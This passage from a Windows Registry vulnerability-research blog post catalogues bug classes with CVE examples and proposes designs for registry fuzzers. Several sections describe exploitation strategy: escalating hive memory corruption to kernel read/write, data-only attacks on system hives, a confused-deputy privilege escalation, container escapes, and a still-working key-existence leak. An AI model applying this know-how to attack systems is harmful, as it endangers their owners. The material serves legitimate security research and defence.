The second type of memory corruption encountered in the registry is hive-based memory corruption.This class of bugs is unique to the registry and is based on the fact that data stored in hives serves a dual role. It stores information persistently on disk, but it also works as the representation of the hive in memory in the exact same form. The data is then operated on using C code through pointers, helper functions like memcpy, and so on. Given all this, it doesn't come as a surprise that classic vulnerabilities such as buffer overflows or use-after-free can also occur within this region.
So far, during my research, I have managed to find 17 hive-based memory corruption issues, which constitutes approximately 32% of all 53 vulnerabilities that have been fixed by Microsoft in security bulletins.The vast majority of them were related to just two mechanisms – reference counting security descriptors and operating on subkey lists – but there were also cases of bugs related to other types of objects.
I have started using the term "inconsistent hive state", referring to any situation where the regf format state either ceases to be internally consistent or stops accurately reflecting cached copies of the same data within other kernel objects.I described one such issue here, where the _CM_BIG_DATA.Count field stops correctly corresponding to the _CM_KEY_VALUE.DataLength field for the same registry value.However, despite this specific behavior being incorrect, according to both my analysis and Microsoft's, it doesn't have any security implications for the system.In this context, the term "hive-based memory corruption" denotes a slightly narrower group of issues that not only allow reaching any inconsistent state but specifically enable overwriting valid regf structures with attacker-controlled data.
The general scheme for exploiting hive-based memory corruption closely resembles the typical exploitation of any other memory corruption.The attacker's initial objective is to leverage the available primitive and manipulate memory allocations/deallocations to overwrite a specific object in a controlled manner.On modern systems, achieving this stage reliably within the heap or kernel pools can be challenging due to allocator randomization and enforced consistency checks.However, the cell allocator implemented by the Windows kernel is highly favorable for the attacker: it lacks any safeguards, and its behavior is entirely deterministic, which greatly simplifies this stage of exploit development.One could even argue that, given the properties of this allocator, virtually any memory corruption primitive within the regf format can be transformed into complete control of the hive in memory with some effort.
With this assumption, let's consider what to do next.Even if we have absolute control over all the internal data of the mapped hive, we are still limited to its mapping in memory, which in itself does not give us much.The question arises as to how we can "escape" from this memory region and use hive memory corruption to overwrite something more interesting, like an arbitrary address in kernel memory (e.g., the security token of our process).
First of all, it is worth noting that such an escape is not always necessary – if the attack is carried out in one of the system hives (SOFTWARE, SYSTEM, etc.), we may not need to corrupt the kernel memory at all. In this case, we could simply perform a data-only attack and modify some system configuration, grant ourselves access to important system keys, etc.However, with many bugs, attacking a highly privileged hive is not possible. Then, the other option available to the attacker is to modify one of the cells to break some invariant of the regf format, and cause a second-order side effect in the form of a kernel pool corruption. Some random ideas are:
Setting too long a key name or inserting the illegal character '\' into the name,
Creating a fake exit node key,
Corrupting the binary structure of a security descriptor so that the internal APIs operating on them start misbehaving,
Crafting a tree structure within the hive with a depth greater than the maximum allowed (512 levels of nesting),
... and many, many others.
However, during experiments exploring practical exploitation, I discovered an even better method that grants an attacker the ability to perform reliable arbitrary read and write operations in kernel memory—the ultimate primitive. This method exploits the behavior of 32-bit cell index values, which exhibit unusual behavior when they exceed the hive's total size. I won't elaborate on the full technique here, but for those interested, I discussed it during my presentation at the OffensiveCon conference in May 2024. The subject of exploiting hive memory corruption will be also covered in detail in its own dedicated blog post in the future.
Invalid cell indexes
This is a class of bugs that manifests directly when an incorrect cell index appears in an object—either in a cell within the hive or in a structure on kernel pools, like KCB. These issues can be divided into three subgroups, depending on the degree of control an attacker can gain over the cell index.
Cell index 0xFFFFFFFF (HCELL_NIL)
This is a special marker that indicates that a given structure member/variable of type HCELL_INDEX doesn't point to any specific cell, which is equivalent to a NULL pointer in C. There are many situations where the value 0xFFFFFFFF (in other words, -1) is used and even desired, e.g. to signal that an optional object doesn't exist and shouldn't be processed.The kernel code is prepared for such cases and correctly checks whether a given cell index is equal to this marker before operating on it. However, problems can arise when the value ends up in a place where the kernel always expects a valid index.Any mandatory field in a specific object can be potentially subject to this problem, such as the _CM_KEY_NODE.Security field, which must always point to a valid descriptor and should never be equal to -1 (other than for exit nodes).
Some examples of such vulnerabilities include:
CVE-2023-21772: an unexpected value of -1 being set in _CM_KEY_NODE.Security due to faulty logic in the registry virtualization code, which first freed the old descriptor and only then attempted to allocate a new one, which could fail, leaving the key without any assigned security descriptor.
CVE-2023-35357: an unexpected value of -1 being set in KCB.KeyCell, because the code assumed that it was operating on a physically existing base key, while in practice it could operate on a layered key with Merge-Unbacked semantics, which does not have its own key node, but relies solely on key nodes at lower levels of the key stack.
CVE-2023-35358: another case of an unexpected value of -1 being set in KCB.KeyCell, while the kernel expected that at least one key in the given key node stack would have an allocated key node object.The source of the problem here was incorrect integration of transactions and differencing hives.
When such a problem occurs, it always manifests by the value -1 being passed as the cell index to the HvpGetCellPaged function.For decades, this function completely trusted its parameters, assuming that the input cell index would always be within the bounds of the given hive.Consequently, calling HvpGetCellPaged with a cell index of 0xFFFFFFFF would result in the execution of the following code:
In other words, the function would refer to the Volatile (1) map cell, and within it, to the last element of the Directory and then the Table arrays.Considering the "small dir" optimization described in post #6, it becomes clear that this cell map walk could result in an out-of-bounds memory access within the kernel pools (beyond the boundaries of the _CMHIVE structure).Personally, I haven't tried to transform this primitive into anything more useful, but it seems evident that with some control over the kernel memory around _CMHIVE, it should theoretically be possible to get the HvpGetCellPaged function to return any address chosen by the attacker.Further exploitation prospects would largely depend on the subsequent operations that would be performed on such a fake cell, and the extent to which a local user could influence them.In summary, I've always considered these types of bugs as "exploitable on paper, but quite difficult to exploit in practice."
Ultimately, none of this matters much, because it seems that Microsoft noticed a trend in these vulnerabilities and, in July 2023, added a special condition to the HvpGetCellFlat and HvpGetCellPaged functions:
This basically means that the specific case of index -1 has been completely mitigated, since rather than allowing any chance of exploitation, the system now immediately shuts down with a Blue Screen of Death. As a result, the bug class no longer has any security implications. However, I do feel a bit disappointed – if Microsoft deemed the check sufficiently important to add to the code, they could have made it just a tiny bit stronger, for example:
The above check would reject all cell indexes exceeding the length of the corresponding storage type, and it is exactly what the HvpReleaseCellPaged function currently does.Checking this slightly stronger condition in one fell swoop would handle invalid indexes of -1 and completely mitigate the previously mentioned technique of out-of-bounds cell indexes. While not introduced yet, I still secretly hope that it will happen one day... 🙂
Dangling (out-of-date) cell indexes
Another group of vulnerabilities related to cell indexes are cases where, after a cell is freed, its index remains in an active cell within the registry. Simply put, these are just the cell-specific use-after-free conditions, and so the category very closely overlaps with the previously described hive-based memory corruption.
Notable examples of such bugs include:
CVE-2022-37988: Caused by the internal HvReallocateCell function potentially failing when shrinking an existing cell, which its caller assumed was impossible.
CVE-2023-23420: A bug in the transactional key rename operation could lead to a dangling cell index in a key's subkey list, pointing to a freed key node.
CVE-2024-26182: Caused by mishandling a partial success situation where an internal function might successfully perform some operations on the hive (reallocate existing subkey lists) but ultimately return an error code, causing the caller to skip updating the _CM_KEY_NODE.SubKeyLists[...] field accordingly.
In general, UAF bugs within the hive are powerful primitives that can typically be exploited to achieve total control over the hive's internal data.The fact that both exploits I wrote to demonstrate practical exploitation of hive memory corruption vulnerabilities fall into this category (CVE-2022-34707, CVE-2023-23420) can serve as anecdotal evidence of this statement.
Fully controlled/arbitrary cell indexes
The last type of issues where cell indexes play a major role are situations in which the user somehow obtains full control over the entire 32-bit index value, which is then referenced as a valid cell by the kernel. Notably, this is not about some second-order effect of hive memory corruption, but vulnerabilities where this primitive is the root cause of the problem.Such situations happen relatively rarely, but there have been at least two such cases in the past:
CVE-2022-34708: missing verification of the _CM_KEY_SECURITY.Blink field in the CmpValidateHiveSecurityDescriptors function for the root security descriptor in the hive,
CVE-2023-35356: referencing the _CM_KEY_NODE.ValueList.List field in a predefined key, in which the ValueList structure has completely different semantics, and its List field can be set to an arbitrary value.
Given that the correctness of cell indexes is a fairly obvious requirement known to Microsoft kernel developers, they pay close attention to verifying them thoroughly.For this reason, I think that the chance we will have many more such bugs in the future is slim.As for their exploitation, they may seem similar in nature to the way hive memory corruption can be exploited with out-of-bounds cell indexes, but in fact, these are two different scenarios. With hive-based memory corruption, we can dynamically change the value of a cell index multiple times as needed, and here, we would only have one specific 32-bit value at our disposal.If, in a hypothetical vulnerability, some interesting operations were performed on such a controlled index, I would probably still reduce the problem to the typical UAF case, try to obtain full binary control over the hive, and continue from there.
Low-level information disclosure (memory, pointers)
Since the registry code is written in C and operates with kernel privileges, and additionally has not yet been completely rewritten to use zeroing ExAllocatePool functions, it is natural that it may be vulnerable to memory disclosure issues when copying output data to user-mode.The most canonical example of such a bug was CVE-2023-38140, where the VrpPostEnumerateKey function (one of the sub-handlers of the VRegDriver registry callback) allocated a buffer on kernel pools with a user-controlled length, filled it with some amount of data – potentially less than the buffer size – and then copied the entire buffer back to user mode, including uninitialized bytes at the end of the allocation.
However, besides this typical memory disclosure scenario, it is worth noting two more things in the context of the registry.One of them is that, as we know, the registry operates not only on memory but also on various files on disk, and therefore the filesystem becomes another type of data sink where data leakage can also occur.And so, for example, in CVE-2022-35768, kernel pool memory could be disclosed directly to the hive file due to an out-of-bounds read vulnerability, and in CVE-2023-28271, both uninitialized data and various kernel-mode pointers were leaked to KTM transaction log files.
The second interesting observation is that the registry implementation does not have to be solely the source of the data leak, but can also be just a medium through which it happens.There is a certain group of keys and values that are readable by ordinary users and initialized with binary data by the kernel and drivers using ZwSetValueKey and similar functions.Therefore, there is a risk that some uninitialized data may leak through this channel, and indeed during my Bochspwn Reloaded research in 2018, I identified several instances of such leaks, such as CVE-2018-0898, CVE-2018-0899, and CVE-2018-0900.
Broken security guarantees, API contracts and common sense assumptions
Besides maintaining internal consistency and being free of low-level bugs, it's also important that the registry behaves logically and predictably, even under unusual conditions. It must adhere to the overall security model of Windows NT, operate in accordance with its public documentation, and behave in a way that aligns with common sense expectations. Failure to do so could result in various problems in the client software that interacts with it, but identifying such deviations from expected behavior can be challenging, as it requires deep understanding of the interface's high-level principles and the practical implications of violating them.
In the following subsections, I will discuss a few examples of issues where the registry's behavior was inconsistent with documentation, system architecture, or common sense.
Security access rights enforcement
The registry implementation must enforce security checks, meaning it must verify appropriate access rights to a key when opening it, and then again when performing specific operations on the obtained handle.Generally, the registry manages this well in most cases.However, there were two bugs in the past that allowed a local user to perform certain operations that they theoretically didn't have sufficient permissions for:
CVE-2023-21750: Due to a logic bug in the CmKeyBodyRemapToVirtual function (related to registry virtualization), it was possible to delete certain keys within the HKLM\Software hive with only KEY_READ and KEY_SET_VALUE rights, without the normally required DELETE right.
CVE-2023-36404: In this case, it was possible to gain access to the values of certain registry keys despite lacking appropriate rights.The attack itself was complex and required specific circumstances: loading a differencing hive overlaid on a system hive with a specially crafted key structure, and then having a system component create a secret key in that system hive.Because of the fact that the handle to the layered key would be opened earlier (and the security access check would be performed at that point in time), creating a new key at a lower level with more restricted permissions wouldn't be considered later, leading to potential information disclosure.
As shown, both these bugs were directly related to incorrect or missing permissions verification, but they weren't particularly attractive in terms of practical attacks.A much more appealing bug was CVE-2019-0881, discovered in registry virtualization a few years earlier by James Forshaw. That vulnerability allowed unprivileged users to read every registry value in the system regardless of the user's privileges, which is about as powerful as a registry infoleak can get.
Confused deputy problems with predefined keys
Predefined keys probably don't need any further introduction at this point in the series. In this specific case of the confused deputy problem, the bug report for CVE-2023-35633 captures the essence of the issue well: if a local attacker had binary control over a hive, they could cause the use of an API like RegOpenKeyExWon any key within that hive to return one of the predefined pseudo-handles like HKEY_LOCAL_MACHINE, HKEY_CURRENT_USER, etc., instead of a normal handle to that key.This behavior was undocumented and unexpected for developers using registry in their code.Unsurprisingly, finding a privileged process that did something interesting on a user-controlled hive wasn't that hard, and it turned out that there was indeed a service in Windows that opened a key inside the HKCU of each logged-in user, and recursively set permissive access rights on that key. By abusing predefined handles, it was possible to redirect the operation and grant ourselves full access to one of the global keys in the system, leading to a fairly straightforward privilege escalation. If you are interested in learning more about the bug and its practical exploitation, please refer to my Windows Registry Deja Vu: The Return of Confused Deputies presentation from CONFidence 2024. In many ways, this attack was a resurrection of a similar confused deputy problem, CVE-2010-0237, which I had discovered together with Gynvael Coldwind.The main difference was that at that time, the redirection of access to keys was achieved via symbolic links, a more obvious and widely known mechanism.
Atomicity of KTM transactions
The main feature of any transaction implementation is that it should guarantee atomicity – that is, either apply all changes being part of the transaction, or none of them.Imagine my surprise then, when I discovered that the registry transaction implementation integrated with the KTM did not guarantee atomicity at all, but merely tried really hard to maintain it.The main problem was that it wasn't designed to handle OOM errors (for example, when a hive was completely full) and, as a result, when such a problem occurred in the middle of committing a transaction, there was no good way to reverse the changes already applied.The Configuration Manager falsely returned a success code to the caller, while retrying to commit the remaining part of the transaction every 30 seconds, hoping that some space would free up in the registry in the meantime, and the operations would eventually succeed.This type of behavior obviously contradicted both the documentation and common sense about how transactions should work.
I reported this issue as CVE-2023-32019, and Microsoft fixed it by completely removing a large part of the code that implemented this functionality, as it was simply impossible to fix correctly without completely redesigning it from scratch.Fortunately, in Windows 10, an alternative transaction implementation for the registry called lightweight transactions was introduced, which was designed correctly and did not have the same problem.As a result, a decision was made to internally redirect the handling of KTM transactions within the Windows kernel to the same engine that is responsible for lightweight transactions.
Containerized registry escapes
The general goal of differencing hives and layered keys is to implement registry containerization.This mechanism creates an isolated registry view for a specific group of processes, without direct access to the host registry (a sort of "chroot" for the Windows registry).Unfortunately, there isn't much official documentation on this topic, and it's particularly difficult to find information on whether this type of containerization is a Microsoft-supported security boundary that warrants fixes in the monthly security bulletins. I think it is reasonable to expect that since the mechanism is used to isolate the registry in well supported use-cases (such as running Docker containers), it should ideally not be trivial to bypass, but I was unable to find any official statement to support or refute this assumption.
When I looked further into it, I discovered that the redirection of registry calls within containerized environments was managed by registry callbacks, specifically one called VrpRegistryCallback.While callbacks do indeed seem well suited for this purpose, the devil is in the details – specifically, error handling.I found at least two ways a containerized application could trigger an error during the execution of the internal VrpPreOpenOrCreate/VrpPostOpenOrCreate handlers.This resulted in exiting the callback prematurely while an important part of the redirection logic still hadn't been executed, and consequently led to the process gaining access to the host's registry view.Additionally, I found that another logical bug allowed access to the host's registry through differencing hives associated with other active containers in the system.
As I mentioned, I wasn't entirely clear on the state of Microsoft's support for this mechanism, but luckily I didn't have to wonder for too long.It turned out that James Forshaw had a similar dilemma and managed to reach an understanding with the vendor on the matter, which he described in his blog post.
After much back and forth with various people in MSRC a decision was made. If a container escape works from a non-administrator user, basically if you can access resources outside of the container, then it would be considered a privilege escalation and therefore serviceable.
[...]
Microsoft has not changed the MSRC servicing criteria at the time of writing. However, they will consider fixing any issue which on the surface seems to escape a Windows Server Container but doesn’t require administrator privileges. It will be classed as an elevation of privilege.
Eventually, I reported all three bugs inone report, and Microsoft fixed them shortly after as CVE-2023-36576. I particularly like the first issue described in the report (the bug in VrpBuildKeyPath), as it makes a very interesting example of how a theoretically low-level issue like a 16-bit integer overflow can have the high-level consequences of a container escape, without any memory corruption being involved.
Adherence to official key and value name length limits
The constraints on the length of key and value names are quite simple.Microsoft defines the maximum values on a dedicated documentation page called Registry Element Size Limits:
Registry element
Size limit
Key name
255 characters. The key name includes the absolute path of the key in the registry, always starting at a base key, for example, HKEY_LOCAL_MACHINE.
Value name
16,383 characters. Windows 2000: 260 ANSI characters or 16,383 Unicode characters.
Admittedly, the way this is worded is quite confusing, and I think it would be better if the information in the second column simply ended after the first period.As it stands, the explanation for "key name" seems to suggest that the 255-character limit applies to the entire key path relative to the top-level key. In reality, the limit of 255 (or to be precise, 256) characters applies to the individual name of each registry key, and value names are indeed limited to 16,383 characters. These assumptions are the basis for the entire registry code.
Despite these being fundamental and documented values, it might be surprising that the requirements weren't correctly verified in the hive loading code until October 2022.Specifically, it was possible to load a hive containing a key with a name of up to 1040 characters. Furthermore, the length of a value's name wasn't checked at all, meaning it could consist of up to 65535 characters, which is the maximum value of the uint16 type representing its length.In both cases, it was possible to exceed the theoretical limits set by the documentation by more than four times.
I reported these bugs as part of theCVE-2022-37991 report.On a default Windows installation, I found a way to potentially exploit (or at least trigger a reproducible crash) the missing check for the value name length, but I couldn't demonstrate the consequences of an overly long key name.Nevertheless, I'm convinced that with a bit more research, one could find an application or driver implementing a registry callback that assumes key names cannot be longer than 255 characters, leading to a buffer overflow or other memory corruption.This example clearly shows that even the official documentation cannot be trusted, and all assumptions, even the most fundamental ones, must be verified directly in the code during vulnerability research.
Creation of stable keys under volatile ones
Another rational behavior of the registry is that it doesn't allow you to create Stable keys under Volatile parent keys.This makes sense, as stable keys are stored on disk and persist through hive unload and system reboot, whereas volatile keys only exist in memory and vanish when the hive is unloaded.Consequently, a stable key under a volatile one wouldn't be practical, as its parent would disappear after a restart, severing its path to the registry tree root, causing the stable key to disappear as well.Therefore, under normal conditions, creating such a key is impossible, and any attempts to do so results in the ERROR_CHILD_MUST_BE_VOLATILE error being returned to the caller.While there's no official mention of this in the documentation (except for a brief description of the error code), Raymond Chen addressed it on his blog, providing at least some documentation of this behavior.
During my research, I discovered two ways to bypass this requirement and createstable keys under volatile ones.These were issues CVE-2023-21748 and CVE-2024-26173, where the first one was related to registry virtualization, and the second to transaction support.Interestingly, in both of these cases, it was clear that a certain invariant in the registry design was being broken, but it was less clear whether this could have any real consequences for system security.After spending some time on analysis, I came to the conclusion that there was at least a theoretical chance of some security impact, due to the fact that security descriptors of volatile keys are not linked together into a global linked list in the same way stable security descriptors are. Long story short, if later in time some other stable keys in the hive started to share the security descriptor of the stable-under-volatile one, then their security would become invalidated and forcibly reset to their parent's descriptor on the next system reboot, violating the security model of the registry. Microsoft apparently shared my assessment of the situation, as they decided to fix both bugs as part of a security bulletin. Still, this is an interesting illustration of the complexity of the registry – sometimes finding an anomaly in the kernel logic can generate some kind of inconsistent state, but its implications might not be clear without further, detailed analysis.
Arbitrary key existence information leak
If someone were to ask me whether an unprivileged user should be able to check for the existence of a registry key without having any access rights to that key or its parent in a secure operating system, I would say absolutely not.However, this is possible on Windows, because the code responsible for opening keys first performs a full path lookup, and only then checks the access rights.This allows for differentiation between existing keys (return value STATUS_ACCESS_DENIED) and non-existing keys (return value STATUS_OBJECT_NAME_NOT_FOUND).
After discovering this behavior, I decided to report it to Microsoft in December 2023.The vendor's response was that it is indeed a bug, but its severity is not high enough to be fixed as an official vulnerability.I somewhat understand this interpretation, as the amount of information that can be disclosed in this way is quite low (i.e. limited configuration elements of other users), and fixing the issue would probably involve significant code refactoring and a potential performance decrease.It's also difficult to say whether this type of boundary is properly defensible, because after one fix it might turn out that there are many other ways to leak this type of information.Therefore, the technique described in my report still works at the time of writing this blog post.
Miscellaneous
In addition to the bug classes mentioned above, there are also many other types of issues that can occur in the registry.I certainly won't be able to name them all, but briefly, here are a few more primitives that come to mind when I think about registry vulnerabilities:
Low-severity security bugs:These include local DoS issues such as NULL pointer dereferences, infinite loops, direct KeBugCheckEx calls, as well as classic memory leaks, low-quality out-of-bounds reads, and others. The details of a number of such bugs can be found in the p0tools/WinRegLowSeverityBugs repository on GitHub.
Real, but unexploitable bugs: These are bugs that are present in the code, but cannot be exploited due to some mitigating factors. Examples include bugs in the CmpComputeComponentHashesand HvCheckBin internal functions.
Memory management bugs: These bugs are specifically related to the management of hive section views in the context of the Registry process. This especially applies to situations where the hive is loaded from a file on a removable drive, from a remote SMB share, or from a file on a local disk but with unusual semantics (e.g., a placeholder file created through the Cloud Filter API). Two examples of this vulnerability type are CVE-2024-43452 and CVE-2024-49114.
Due to the Windows Registry's strictly defined format (regf) and interface (around a dozen specific syscalls that operate on it), automated testing in the form of fuzzing is certainly possible.We are dealing with kernel code here, so it's not as simple as taking any library that parses a file format and connecting it to a standard fuzzer like AFL++, Honggfuzz, or Jackalope – registry fuzzing requires a bit more work.But, in its simplest form, it could consist of just a few trivial steps: finding an existing regf file, writing a bit-flipping mutator, writing a short harness that loads the hive using RegLoadAppKey, and then running those two programs in an infinite loop and waiting for the system to crash.
It's hard to argue that this isn't some form of fuzzing, and in many cases, these kinds of methods are perfectly sufficient for finding plenty of serious vulnerabilities.After all, my entire months-long research project started with this fairly primitive fuzzing, which did more or less what I described above, with just a few additional improvements:
Fixing the hash in the regf header,
Performing a few simple operations on the hive, like enumerating subkeys and values,
Running on multiple machines at once,
Collecting code coverage information from the Windows kernel.
Despite my best efforts, this type of fuzzing was only able to find one vulnerability (CVE-2022-35768), compared to over 50 that I later discovered manually by analyzing the Windows kernel code myself.This ratio doesn't speak well for fuzzing, and it stems from the fact that the registry isn't as simple a target for automated testing as it might seem. On the contrary, each individual element of such fuzzing is quite difficult and requires a large time investment if one wishes to do it effectively.In the following sections, I'll focus on each of these components (corpus, mutator, harness and bug detection), pointing out what I think could be improved in them compared to the most basic version discussed above.
Initial corpus
The first issue a potential researcher may encounter is gathering an initial corpus of input files.Sure, one can typically find dozens of regf files even on a clean Windows installation, but the problem is that they are all very simple and don't exhibit characteristics interesting from a fuzzing perspective. In particular:
All of these hives are generated by the same registry implementation, which means that their state is limited to the set of states produced by Windows, and not the wider set of states accepted by the hive loader.
The data structures within them are practically never even close to the limits imposed by the format itself, for example:
The maximum length of key and value names are 256 and 16,383 characters, but most names in standard hives are shorter than 30 characters.
The maximum nesting depth of the tree is 512 levels, but in most hives, the nesting doesn't exceed 10 levels.
The maximum number of keys and values in a hive is limited only by the maximum space of 2 GiB, but standard hives usually include at most a few subkeys and associated values – certainly not the quantities that could trigger any real bugs in the code.
This means that gathering a good initial corpus of hives is very difficult, especially considering that there aren't many interesting regf hives available on the Internet, either.The other options are as follows: either simply accept the poor starting corpus and hope that these shortcomings will be made up for by a good mutator (see next section), especially if combined with coverage-based fuzzing, or try to generate a better one yourself by writing a generator based on one of the existing interfaces (the kernel registry implementation, the user-mode Offline Registry Library, or some other open-source library). As a last resort, you could also write your own regf file generator from scratch, where you would have full control over every aspect of the format and could introduce any variance at any level of abstraction. The last approach is certainly the most ambitious and time-consuming, but could potentially yield the best results.
Mutator
Overall, the issue with the mutator is very similar to the issue with the initial corpus.In both cases, the goal is to generate the most "interesting" regf files possible, according to some metric.However, in this case, we can no longer ignore the problem and hope for the best.If the mutator doesn't introduce any high-quality changes to the input file, nothing else will. There is no way around it – we have to figure out how to make our mutator test as much state of the registry implementation as possible.
For simplicity, let's assume the simplest possible mutator that randomly selects N bits in the input data and flips them, and/or selects some M bytes and replaces them with other random values.Let's consider for a moment what logical types of changes this approach can introduce to the hive structure:
Enable or disable some flags, e.g., in the _CM_KEY_NODE.Flags field,
Change the value of a field indicating the length of an array or list, e.g., _CM_KEY_NODE.NameLength, _CM_KEY_VALUE.DataLength, or a 32-bit field indicating the size of a given cell,
Slightly change the name of a key or value, or the data in the backing cell of a value,
Corrupt a value sanitized during hive loading, causing the object to be removed from the hive during the self-healing process,
Change the value of some cell index, usually to an incorrect value,
Change/corrupt the binary representation of a security descriptor in some way.
This may seem like a broad range of changes, but in fact, each of them is very local and uncoordinated with other modifications in the file.This can be compared to binary mutation of an XML file – sometimes we may corrupt/remove some critical tag or attribute, or even change some textually encoded number to another valid number – but in general, we should not expect any interesting structural changes to occur, such as changing the order of objects, adding/removing objects, duplicating objects, etc. Hives are very similar in nature. For example, it is possible to set the KEY_SYM_LINK flag in a key node by pure chance, but for this key to actually become a valid symlink, it is also necessary to remove all its current values, and add a new value named "SymbolicLinkValue" of type REG_LINK containing a fully qualified registry path. With a mutator operating on single bits and bytes, the probability of this happening is effectively zero.
In my opinion, a dedicated regf mutator would need to operate simultaneously on four levels of abstraction, in order to be able to create the conditions necessary for triggering most bugs:
On the high-level structure of a hive, where only logical objects matter: keys, values, security descriptors, and the relationships between them.Mutations could involve adding, removing, copying, moving, and changing the internal properties of these three main object types.These mutations should generally conform to the regf format, but sometimes push the boundaries by testing edge cases like handling long names, a large number of subkeys or values, or a deeply nested tree.
On the level of specific cell types, which can represent the same information in many different ways.This primarily refers to all kinds of lists that connect higher-level objects, particularly subkey lists (index leaves, fast leaves, hash leaves, root indexes), value lists, and linked lists of security descriptors.Where permitted by the format (or sometimes even in violation of the format), the internal representation of these lists could be changed, and its elements could be rearranged or duplicated.
On the level of cell and bin layout: taking the entire set of interconnected cells as input, they could be rearranged in different orders, in bins of different sizes, sometimes interspersed with empty (or artificially allocated) cells or bins.This could be used to find vulnerabilities specifically related to hive memory management, and also to potentially facilitate triggering/reproducing hive memory corruption issues more reliably.
On the level of bits and bytes: although this technique is not very effective on its own, it can complement more intelligent mutations.You never know what additional problems can be revealed through completely random changes that may not have been anticipated when implementing the previous ideas. The only caveat is to be careful with the number of those bit flips, as too many of them could negate the overall improvement achieved through higher-level mutations.
As you can see, developing a good mutator requires some consideration of the hive at many levels, and would likely be a long and tedious process.The question also remains whether the time spent in this way would be worth it compared to the effects that can be achieved through manual code analysis.This is an open question, but as a fan of the registry, I would be thrilled to see an open-source project equivalent to fonttools for regf files, i.e., a library that allows "decompiling" hives into XML (or similar) and enables efficient operation on it.One can only dream... 🙂
Finally, I would like to point out that regf files are not the only type of input for which a dedicated mutator could be created.As I've already mentioned before, there are also accompanying .LOG1/.LOG2 and .blf/.regtrans-ms files, responsible for the atomicity of individual registry operations and KTM transactions, respectively.Both types of files may not be as complex as the core hive files,but mutating them might still be worthwhile, especially since some bugs have been historically found in their handling.Additionally, otherregistry operations performed by the harness could also be treated as part of the input.This would resemble an architecture similar toSyzkaller, and storing registry call sequences as part of the corpus would require writing a special grammar-based mutator, or possibly adapting an existing one.
Harness
While having a good mutator for registry-related files is a great start, the vast majority of potential vulnerabilities do not manifest when loading a malformed hive, but only during further operations on said hive.These bugs are mainly related to some complex and unexpected state that has arisen in the registry, and triggering it usually requires a very specific sequence of system calls.Therefore, a well-constructed harness should support a broad range of registry operations in order to effectively test as many different internal states as possible.In particular, it should:
Perform all standard operations on keys (opening, creating, deleting, renaming, enumerating, setting properties, querying properties, setting notifications), values (setting, deleting, enumerating, querying data) and security descriptors (querying keys for security descriptors, setting new descriptors). For the best result, it would be preferable to randomize the values of their arguments (to a reasonable extent), as well as the order in which the operations are performed.
Support a "deferred close" mechanism, i.e. instead of closing key handles immediately, maintain a certain cache of such handles to refer to them at a later point in time.In particular, the idea is to sometimes perform an operation on a key that has been deleted, renamed or had its hive unloaded, in order to trigger potential bugs related to object lifetime or the verification that a given key actually exists prior to performing any action on it.
Load input hives with different flags.The main point here is to load hives with and without the REG_APP_HIVE flag, as the differences in the treatment of app hives and regular hives are sometimes significant enough to warrant testing both scenarios. Randomizing the states of the other few flags that can take arbitrary values could also yield positive results.
Support the registry virtualization mechanism, which can consist of several components:
Periodically enabling and disabling virtualization for the current process using the SetTokenInformation(TokenVirtualizationEnabled) call,
Setting various virtualization flags for individual keys using the NtSetInformationKey(KeySetVirtualizationInformation) call,
Creating an additional key structure under the HKU\<SID>_Classes\VirtualStore tree to exercise the mechanism of key replication / merging state in "query" type operations (e.g. in enumeration of the values of a virtualized key).
Use transactions, both KTM and lightweight.In particular, it would be useful to mix non-transactional calls with transactional ones, as well as transactional calls within different transactions.This way, we would be able to the code paths responsible for making sure that no two transactions collide with each other, and that non-transactional operations always roll back the entire transactional state before making any changes to the registry.It would also be beneficial if some of these transactions were committed and some rolled back, to test as much of their implementation as possible.
Support layered keys. For many registry operations, the layered key implementation is completely different than the standard one, and almost always more complicated.However, adding differencing hive support to the fuzzer wouldn't be trivial, as it would require additional communication with VRegDriver to load/unload the hive. It would also require making some fundamental decisions: which hive(s) do we overlay our input hive on top of? Should we keep pairs of hives in the corpus and overlay them one on top of the other, in order to control the properties of all the keys on the layered key stack?Do we limit ourselves to a key stack of two elements, or create more complicated stacks consisting of three or more hives?These are all open questions to which I don't know the answer, but I am sure that implementing some form of layered key support would positively affect the number of vulnerabilities that could be found this way.
Potentially support multi-threading and execute the harness logic in multiple threads at once, allowing it to trigger potential race conditions.The downside of this idea is that unless we run the fuzzing in some special environment, it would probably be non-deterministic, making timing-related bugs difficult to reproduce.
The final consideration for harness development is the prevalence of registry issues caused by improper error handling, particularly cell allocator out-of-memory errors.A potential harness feature could be to artificially trigger these circumstances, perhaps by aggressively filling almost all of the 2 GiB stable/volatile space, causing HvAllocateCell/HvReallocateCell functions to fail.However, this approach would waste significant disk space and memory, and substantially slow down fuzzing, so the net benefit is unclear.Alternative options include hooking the allocator functions to make them fail for a specific fraction of requests (e.g., using DTrace), or applying a runtime kernel modification to reduce the maximum hive space size from 2 GiB to some smaller value (e.g., 16 MiB). These ideas are purely theoretical and would require further testing.
Bug detection
Alongside a good initial corpus, mutator and harness, the fourth and final pillar of an effective fuzzing session is bug detection.After all, what good is it to generate an interesting sample and trigger a problem with a series of complicated calls, if we don't even notice the bug occurring?In typical user-mode fuzzing, bug detection is assisted by tools such as AddressSanitizer, which are integrated into the build process and add extra instrumentation to the binary to enable the detection of all invalid memory references taking place in the code.In the case of the Windows kernel, a similar role is played by the Special Pool, which isolates individual allocations on kernel pools to maximize the probability of a crash when an out-of-bounds access/use-after-free condition occurs.Additionally, it may also be beneficial to enable the Low Resources Simulation mechanism, which can cause some pool allocations to fail and thus potentially help in triggering bugs related to handling OOM conditions.
The challenge with the registry lies in the fact that most bugs don't stem from memory corruption within the kernel pools.Typically, we're dealing with either hive-based memory corruption or its early stage—an inconsistent state within the registry that violates a crucial invariant.Reaching memory corruption in such a scenario necessitates additional steps from an attacker.For instance, consider a situation where the reference count of a security descriptor is decremented without removing a reference to it in a key node.To trigger a system bugcheck, one would need to remove all other references to that security descriptor (e.g., by deleting keys), overwrite it with different data (e.g., by setting a value), and then perform an operation on it or one of its adjacent descriptors that would lead to a system crash.Each extra step significantly decreases the likelihood of achieving the desired state.The fact that cells have their own allocator further hinders fuzzing, as there's no equivalent of the Special Pool available for it.
Here are a few ideas for addressing the problem, some more realistic than others:
If we had a special library capable of breaking down regf files at various levels of abstraction, we could have the mutator create the input hive in a way that maximizes the chances of a crash if a bug occurs during a cell operation.For example, we could assign each key a separate security descriptor with refcount=1 (which should make triggering UAFs easier) and place each cell at the end of a separate bin, followed by another, empty bin.This behavior would be very similar to how the Special Pool works, but at the bin and cell level.
Again, if we had a good regf file parser, we could open the hive saved on disk after each iteration of the harness and verify its internal consistency.This would allow us to catch inconsistent hive states early, even if they didn't lead to memory corruption or a system crash in a specific case.
